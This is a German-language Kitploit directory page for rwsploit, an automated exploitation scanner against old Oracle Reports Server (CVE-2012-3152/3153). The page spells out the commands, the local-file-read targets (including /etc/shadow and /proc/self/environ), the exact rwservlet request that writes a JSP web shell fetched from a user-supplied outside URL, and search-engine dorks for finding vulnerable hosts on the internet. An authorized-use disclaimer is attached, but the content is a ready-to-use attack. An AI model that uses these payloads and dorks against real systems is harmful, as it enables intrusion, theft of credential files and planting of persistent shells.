Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
rwsploit — Automatisierter Exploitation-Scanner für Oracle Reports Server (rwservlet) — CVE-2012-3152 / CVE-2012-3153. Erkennt, identifiziert, liest Dateien via LFI, testet SSRF via Webhook und lädt JSP-Shells hoch. Ziel: Oracle Reports < 11g. Nur für autorisierte Nutzung. | Kitploit
Tools/GitHubGitHub/abq0/rwsploit
AufklärungSchwachstellenscannerPayload-GenerierungExploitationShellcodeWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsRed Teaming
GitHubabq0/rwsploit

rwsploit

Automatisierter Exploitation-Scanner für Oracle Reports Server (rwservlet) — CVE-2012-3152 / CVE-2012-3153. Erkennt, identifiziert, liest Dateien via LFI, testet SSRF via Webhook und lädt JSP-Shells hoch. Ziel: Oracle Reports < 11g. Nur für autorisierte Nutzung.

62vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

Oracle Reports rwservlet Scanner

⚠️ Nur für autorisierte Nutzung. Führen Sie dieses Tool nur gegen Systeme aus, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben. Nicht autorisierte Nutzung ist illegal.

Ein gezielter Exploitation-Scanner für Oracle Reports Server (rwservlet), der auf CVE-2012-3152 und CVE-2012-3153 abzielt – betroffen sind Versionen unter 11g. Automatisiert Erkennung, LFI-Dateiauslesen, SSRF-Tests und JSP-Shell-Upload über einzelne IPs, CIDR-Bereiche oder Ziellisten. Intelligentes TCP/HTTP-Vorfiltern überspringt sofort tote Hosts, sodass keine Zeit verschwendet wird.


Installation

root@kitploit:~
git clone https://github.com/abq0/rwsploit.git
cd rwsploit
pip install requests

Python 3.8+ erforderlich. Keine anderen Abhängigkeiten.


Verwendung

root@kitploit:~
python3 rwsploit.py -t <IP|CIDR> [options]
python3 rwsploit.py -f <file>   [options]

Ohne Argumente ausführen, um das vollständige Hilfemenü und Recon-Dorks anzuzeigen.


Optionen


Beispiele

root@kitploit:~
# Nur Erkennung
python3 rwsploit.py -t 10.10.10.55 -p 7777

# Erkennung + LFI
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi

# Vollständige Kette — LFI + SSRF + Shell
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi --shell

# Subnetz-Scan, Dumps speichern
python3 rwsploit.py -t 10.10.10.0/24 -p 7777 --lfi -o loot

# Aus Datei, kein SSRF
python3 rwsploit.py -f targets.txt --lfi --no-ssrf

targets.txt-Format

root@kitploit:~
# comment — skipped
10.10.10.55
10.10.11.0/24

Funktionen

LFI

Liest weltweit lesbare Dateien, indem es zuerst das Betriebssystem über showenv erkennt und dann nur das passende Payload-Set ausführt.

Linux — /etc/passwd, /etc/shadow, /etc/hosts, /etc/issue, /etc/os-release, /etc/group, /etc/crontab, /etc/timezone, /proc/version, /proc/cmdline, /proc/self/environ

Windows — win.ini, system32\drivers\etc\hosts, boot.ini, system.ini, AUTOEXEC.BAT

🚨 Keine LFI-Ausgabe bedeutet nicht, dass das Ziel sicher ist – Oracles Konfiguration und Dateiberechtigungen variieren. Testen Sie SSRF und Shell-Upload immer unabhängig.

SSRF

Sendet rwservlet?JOBTYPE=rwurl&URLPARAMETER=<webhook> und fragt die webhook.site API nach einem Callback ab. Bei einem Treffer werden die Quell-IP, Methode und der User-Agent ausgegeben. Ein neues Webhook-Token wird automatisch beim Start erstellt.

Shell-Upload (--shell)

  1. Fragt nach der URL, die Ihren JSP-Shell-Inhalt bereitstellt.
  2. Liest PATH_TRANSLATED aus showenv, um den tatsächlichen Webroot-Pfad zu erhalten.
  3. Generiert einen zufälligen Shell-Namen (z.B. kxqbrmfa.jsp).
  4. Schreibt ihn via: rwservlet?report=xyzzy&destype=file&desname=<webroot\shell.jsp>&JOBTYPE=rwurl&URLPARAMETER=<your URL>
  5. Überprüft durch Abfragen der Shell-URL auf HTTP 200 und gibt den Live-Link aus.

Recon-Dorks — Oracle Reports < v11

Google

root@kitploit:~
inurl:"/reports/rwservlet" -site:oracle.com
inurl:"/reports/rwservlet/showenv"
inurl:"/reports/rwservlet/getserverinfo"
intitle:"Oracle Reports Server - Authenticate" inurl:rwservlet

Shodan

root@kitploit:~
http.html:"rwservlet"
http.html:"/reports/rwservlet" http.html:"Oracle"
http.html:"rwservlet/showenv"
http.html:"getserverinfo" http.html:"Oracle Reports"

FOFA

root@kitploit:~
body="/reports/rwservlet"
body="rwservlet" && body="Oracle Reports"
body="/reports/rwservlet/showenv"
body="getserverinfo" && body="rwservlet"

Censys

root@kitploit:~
services.http.response.body: "/reports/rwservlet"
services.http.response.body: "rwservlet" and services.http.response.body: "Oracle Reports"
services.http.response.body: "rwservlet/showenv"
services.http.response.html_title: "Oracle Reports"

CVEs

CVEBeschreibung
CVE-2012-3152Nicht authentifiziertes Dateilesen über den rwservlet report-Parameter
CVE-2012-3153SSRF und Dateischreiben über JOBTYPE=rwurl + URLPARAMETER

Betrifft Oracle Reports Server 6i, 9i, 10g – in 11g behoben.


Rechtliches

Nur für autorisierte Penetrationstests, CTF-Herausforderungen und Sicherheitsforschung. Der Autor übernimmt keine Verantwortung für Missbrauch.

Tool herunterladen
FlagBeschreibungStandard
-tZiel-IP, Hostname oder CIDR. Mehrere Werte werden akzeptiert.—
-fDatei mit einer IP oder CIDR pro Zeile. # = Kommentar.—
-pEin benutzerdefinierter Port – überschreibt die Standardportliste.80 443 8080 7777 7778 7779 8443 9090
-TGleichzeitige Threads.15
-oLFI-Dumps mit diesem Präfix auf die Festplatte speichern. Z.B. -o loot → loot_<ip>_<port>_<file>.txtstdout only
--timeoutAnfrage-Timeout in Sekunden.10
--lfiLFI-Dateilese-Payloads ausführen. Das Betriebssystem wird zuerst erkannt, sodass nur relevante Payloads ausgeführt werden.off
--no-ssrfSSRF-Webhook-Test überspringen.off
--shellEine JSP-Shell hochladen. Fragt nach der URL, die Ihren Shell-Inhalt bereitstellt.off
-hHilfe und Recon-Dorks anzeigen.—